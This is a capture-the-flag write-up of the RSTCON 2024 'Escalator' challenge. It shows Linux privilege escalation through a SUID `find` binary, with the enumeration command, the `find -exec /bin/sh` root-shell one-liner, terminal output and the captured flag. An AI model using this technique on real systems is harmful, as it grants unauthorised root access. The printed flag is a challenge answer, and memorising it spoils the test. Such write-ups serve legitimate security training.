# RSTCON 2024 - Escalator **Title**: Escalator **Description:** Help! We need someone to climb from the bottom to the top. Can you find the way? _Escalate privileges to the root user and read the flag file in `/flag.txt`_ Access the environment via SSH: `ssh -p 7000 ctf-41bd06030f59@ssh.dyn.mctf.io` ## Solution: First I SSHed into the instance and tried to `cat` but it didn't work since we aren't the the privileged user: ```bash hackerman@af8f7997c0b3:/$ ls bin boot dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var hackerman@af8f7997c0b3:/$ cat flag.txt cat: flag.txt: Permission denied ``` My next instinct was to search for binaries with the SUID bit set (those that run as root): ```bash hackerman@af8f7997c0b3:/$ find / -perm -u=s -type f 2>/dev/null /usr/bin/chsh /usr/bin/find /usr/bin/su /usr/bin/mount /usr/bin/gpasswd /usr/bin/chfn /usr/bin/passwd /usr/bin/umount /usr/bin/newgrp ``` Now that we know we have a few binaries with the SUID bit set, the most interesting one I found for privilege escalation is `/usr/bin/find` since `find` is extremely versatile and allows you to execute arbitrary commands via the `-exec` option. This flexibility lets you directly invoke a root shell or run commands with elevated privileges, which is ideal for privilege escalation, I tried leveraging the `find` binary to execute a command as root by running the following: ```bash find . -exec /bin/sh \; -quit ``` This command uses `find` to execute a shell with root privileges due to SUID bit, once I had the root shell, I should be able to navigate to the `/root/` directory and read the `flag.txt` file. ```bash hackerman@af8f7997c0b3:/$ find . -exec /bin/sh \; -quit $ ``` And this was successful, we spawned a shell with `find`, now I tried reading the `flag.txt` directly: ```bash $ find / -name flag.txt -exec cat {} \; 2>/dev/null MetaCTF{bc2536631c6d285111bf3e7ed5db2c31} ``` And there's our flag: `MetaCTF{bc2536631c6d285111bf3e7ed5db2c31}`